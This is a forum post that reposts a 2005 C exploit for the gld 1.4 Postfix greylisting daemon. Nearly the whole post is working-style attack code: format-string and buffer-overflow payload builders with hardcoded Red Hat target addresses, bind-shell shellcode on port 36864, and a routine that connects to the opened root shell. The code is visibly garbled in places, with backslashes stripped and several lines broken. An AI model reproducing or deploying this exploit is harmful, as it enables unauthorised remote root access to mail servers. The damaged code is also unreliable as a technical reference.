Asasin
<<ADMIN>>
 Din: Caracal
Inregistrat: acum 17 ani
Postari: 635
|
|
Salim Gasmi GLD Postfix Greylisting Daemon Format String Exploit
Date : 13/04/2005
Rated as : Critical
/*
**
**
** 0x82-meOw-linuxer_forever - gld 1.4 remote overflow format string exploit.
** (c) 2005 Team INetCop Security.
**
** Nickname of this code is,
** `Kill two bird with one stone.' or, `One shot, two kill!.'
** hehehe ;-D
**
** Advisory URL:
** ... 26-GLD.txt
**
** It's as well as RedHat Linux and to gentoo, debian Linux, *BSD.
** You can develop for your flatform.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), E-mail;.
** My World:
**
**
** P.S: My domain x82.i21c.net encountered compulsion withdrawal from the country.
** They are killing many hackers of the Korea. hehehe ;-p
**
*/
/*
**
** These days, the main issue that strikes Korea is small rocky island "Dokdo".
** You can get more detailed information from following websites.
**
** "Japanese goverment has to follow and learn from German goverment"
**
** I can confidently say "Dokdo is belong to Korea".
**
** (1) reference
**
** 1) Their claim that the East Sea has some historical precedent worked,
** as some major book and map publishers, educational web sites and other
** reference materials now include the East Sea name along with the Sea of Japan.
** - worldatlas.com-
**
** ... astsea.htm
**
** 2) On historical perspective and in international law, why there
** is no valid dispute over the ownership of Dokdo.
**
**
**
** 3)Truth in scholarship
**
**
**
**
*/
#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEF_HOST "localhost"
#define PORT 2525
struct os_t {
int number;
char *os_type;
unsigned long dtors_addr;
unsigned long shell;
int sflag;
};
struct os_t platform[]={
{
0,"Red Hat Linux release 7.0 (Guinness) gld 1.4 (format string exploit)",
0x0804db98,0xbfffa3bc,15
},
{
1,"Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)",
0x0804d14c,0x0805506e,15
},
{
2,"Red Hat Linux release 7.0 (Guinness) gld 1.4 (buffer overflow exploit)",
0,0xbfffa5d8,300
},
{
/* jmp *%esp method */
3,"Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)",
0,0x4212c5eb,254
},
{
4,NULL,0,0,0
}
};
int __debug_chk=0;
char t_atk[0xfff*3];
// This is lovable shellcode, that's sweet in linux platform.
char shellcode[]= /* portshell shellcode, 128 bytes (tcp/36864) */
"xebx72x5ex29xc0x89x46x10x40x89xc3x89x46x0cx40x89"
"x46x08x8dx4ex08xb0x66xcdx80x43xc6x46x10x10x66x89"
"x5ex14x88x46x08x29xc0x89xc2x89x46x18xb0x90x66x89"
"x46x16x8dx4ex14x89x4ex0cx8dx4ex08xb0x66xcdx80x89"
"x5ex0cx43x43xb0x66xcdx80x89x56x0cx89x56x10xb0x66"
"x43xcdx80x86xc3xb0x3fx29xc9xcdx80xb0x3fx41xcdx80"
"xb0x3fx41xcdx80x88x56x07x89x76x0cx87xf3x8dx4bx0c"
"xb0x0bxcdx80xe8x89xffxffxff/bin/sh";
void banrl();
int make_bof_code(unsigned long shell,int size,int type);
int make_fmt_code(unsigned long retloc,unsigned long shell,int sflag);
int setsock(char *host,int port);
void usage(char *args);
void re_connt(int sock);
void conn_shell(int sock);
int main(int argc,char *argv[])
{
int sock,type=0;
int portPORT);
char host[256]=DEF_HOST;
int sflag=platform[type].sflag;
unsigned long retloc=platform[type].dtors_addr;
unsigned long shell=platform[type].shell;
(void)banrl();
while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii" !=EOF) {
extern char *optarg;
switch(sock) {
case 'D':
case 'd':
__debug_chk=1;
break;
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'S':
case 's':
shell=strtoul(optarg,NULL,0);
break;
case 'F':
case 'f':
sflag=atoi(optarg);
break;
case 'H':
case 'h':
memset((char *)host,0,sizeof(host));
strncpy(host,optarg,sizeof(host)-1);
break;
case 'T':
case 't':
type=atoi(optarg);
if(type>=4){
(void)usage(argv[0]);
} else {
retloc=platform[type].dtors_addr;
shell=platform[type].shell;
sflag=platform[type].sflag;
}
break;
case 'I':
case 'i':
(void)usage(argv[0]);
break;
case '?':
fprintf(stderr,"Try `%s -i' for more information.nn",argv[0]);
exit(-1);
break;
}
}
fprintf(stdout," #n # target host: %s:%dn",host,port);
fprintf(stdout," # type: %sn",platform[type].os_type);
switch(type)
{
case 0:
case 1:
(int)make_fmt_code(retloc,shell,sflag);
break;
case 2:
(int)make_bof_code(shell,sflag,0);
break;
case 3:
(int)make_bof_code(shell,sflag,1);
}
fprintf(stdout," # send code size: %d byten",strlen(t_atk));
sock=setsock(host,port);
(void)re_connt(sock);
if(__debug_chk) sleep(10);
send(sock,t_atk,strlen(t_atk),0);
close(sock);
fprintf(stdout," #n # Waiting rootshell, Trying %s:36864 ...n",host);
sleep(1);
sock=setsock(host,36864);
(void)re_connt(sock);
fprintf(stdout," # connected to %s:36864 !n #nn",host);
(void)conn_shell(sock);
}
int make_bof_code(unsigned long shell,int size,int type)
{
int a,b;
char nop_shell[8192];
char code_buf[4096];
memset((char *)nop_shell,0,sizeof(nop_shell));
memset((char *)code_buf,0,sizeof(code_buf));
memset((char *)t_atk,0,sizeof(t_atk));
switch(type)
{
case 0:
fprintf(stdout," # method: normal overflow exploit: %d byten",size);
/* sender buffer = nop, shellcode */
for(a=0;a<1000-strlen(shellcode);a++)
nop_shell[a]='N';
for(b=0;b<strlen(shellcode);b++)
nop_shell[a++]=shellcode[b];
/* client_address = retaddr */
for(b=0;b<size*4;b+=4)
*(long *)&code_buf[b]=shell;
snprintf(t_atk,sizeof(t_atk)-1,
"sender=%srn"
"client_address=%srnrn",nop_shell,code_buf);
break;
case 1:
fprintf(stdout," # method: jmp *%%esp exploit: %d byten",size);
/* sender buffer */
for(a=0;a<1000;a++)
nop_shell[a]='N';
/* client_address buffer */
for(b=0;b<size*4;b+=4)
*(long *)&code_buf[b]=0x82828282;
/* ebp */
*(long *)&code_buf[b]=0x41414141;
b+=4;
/* eip (jmp *%esp) */
*(long *)&code_buf[b]shell);
b+=4;
/* jmp nop (0xeb,0x08) */
*(long *)&code_buf[b]=0x08eb08eb;
b+=4;
/* dummy, nop */
// 0x0804d280 0xbfffe1c8 0x08049521
*(long *)&code_buf[b]=0x0804d280;
b+=4;
*(long *)&code_buf[b]=0x90909090;//0xbfffe1c8;
b+=4;
*(long *)&code_buf[b]=0x90909090;//0x08049521;
b+=4;
*(long *)&code_buf[b]=0x90909090;
b+=4;
/* shellcode */
for(a=0;a<strlen(shellcode);a++)
code_buf[b++]=shellcode[a];
snprintf(t_atk,sizeof(t_atk)-1,
"sender=%srn"
"client_address=%srnrn",nop_shell,code_buf);
}
}
int make_fmt_code(unsigned long retloc,unsigned long shell,int sflag)
{
unsigned char header[256];
unsigned char nop_shell[8192];
int a,b,c,d,e,f;
int addr1,addr2,addr3,addr4;
a=b=c=d=e=f=addr1=addr2=addr3=addr4=0;
memset((char *)header,0,sizeof(header));
memset((char *)nop_shell,0,sizeof(nop_shell));
memset((char *)t_atk,0,sizeof(t_atk));
fprintf(stdout," # Make format string, .dtors: %pn",retloc);
*(long *)&header[0]=retloc+0;
*(long *)&header[4]=retloc+1;
*(long *)&header[8]=retloc+2;
*(long *)&header[12]=retloc+3;
ashell>>24)&0xff;
addr1shell>>24)&0xff;
bshell>>16)&0xff;
addr2shell>>16)&0xff;
cshell>>8)&0xff;
addr3shell>>8)&0xff;
dshell>>0)&0xff;
addr4shell>>0)&0xff;
if((addr4-16-65)<10)d+=0x100;
if((addr3-addr4)<10)c+=0x100;
if((addr2-addr3)<10)b+=0x100;
for(e=0;e<320-strlen(shellcode);e++)
nop_shell[e]='N';
for(f=0;f<strlen(shellcode);f++)
nop_shell[e++]=shellcode[f];
fprintf(stdout," #n # shellcode addr: %p, size: %d byten",shell,strlen(nop_shell));
snprintf(t_atk,sizeof(t_atk)-1,
"client_address=%s" /* header */
"%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n" /* fmt code */
"%srnrn", /* shellcode */
header,d-16-65,(sflag+0),c-addr4,(sflag+1),b-addr3,
(sflag+2),0x100+a-addr2,(sflag+3),nop_shell);
}
void re_connt(int sock)
{
if(sock==-1)
{
fprintf(stdout," #n # Failed.n";
fprintf(stdout," # Happy Exploit ! :-)n #nn";
exit(-1);
}
}
int setsock(char *host,int port)
{
int sock;
struct hostent *he;
struct sockaddr_in x82_addr;
if((he=gethostbyname(host))==NULL)
{
herror(" # gethostbyname() error";
return(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
{
perror(" # socket() error";
return(-1);
}
x82_addr.sin_family=AF_INET;
x82_addr.sin_port=htons(port);
x82_addr.sin_addr=*((struct in_addr *)he->h_addr);
bzero(&(x82_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)
{
perror(" # connect() error";
return(-1);
}
return(sock);
}
void conn_shell(int sock)
{
int pckt;
char *cmd="uname -a;id;export TERM=vt100;exec bash -in";
char rbuf[1024];
fd_set rset;
memset((char *)rbuf,0,1024);
fprintf(stdout," #n # Kill two bird with one stone!n";
fprintf(stdout," # OK, It's Rootshelln #nn";
send(sock,cmd,strlen(cmd),0);
while(1)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(sock,&rset))
{
pckt=read(sock,rbuf,1024);
if(pckt<=0)
{
fprintf(stdout," #n # Happy Exploit !n #nn";
exit(0);
}
rbuf[pckt]=0;
printf("%s",rbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
pckt=read(STDIN_FILENO,rbuf,1024);
if(pckt>0)
{
rbuf[pckt]=0;
write(sock,rbuf,pckt);
}
}
}
return;
}
void banrl()
{
fprintf(stdout,"n #n # 0x82-meOw_linuxer_forever -
Greylisting daemon for Postfix remote exploitn";
fprintf(stdout," # szoahc(at)hotmail(dot)comn #nn";
}
void usage(char *args)
{
int i;
fprintf(stdout," Usage: %s -options argumentsnn",args);
fprintf(stdout,"t-r [retloc] - .dtors address.n";
fprintf(stdout,"t-s [shell] - shellcode address.n";
fprintf(stdout,"t-f [flag num] - $-flag count.n";
fprintf(stdout,"t-h [host] - target hostname.n";
fprintf(stdout,"t-t [type num] - target number.n";
fprintf(stdout,"t-i - help information.nn";
fprintf(stdout," - Target Type Number List -nn";
for(i=0;platform[i].os_type!=NULL;i++)
{
fprintf(stdout," {%d} : %sn",i,platform[i].os_type);
}
fprintf(stdout,"n Example: %s -t 0 -h localhostn",args);
fprintf(stdout," Example: %s -r 0x82828282 -s 0x82828282 -f 15nn",args);
exit(0);
}
/* eox */
_______________________________________
إلا الموتى وشهدت نهاية الحرب
|
|
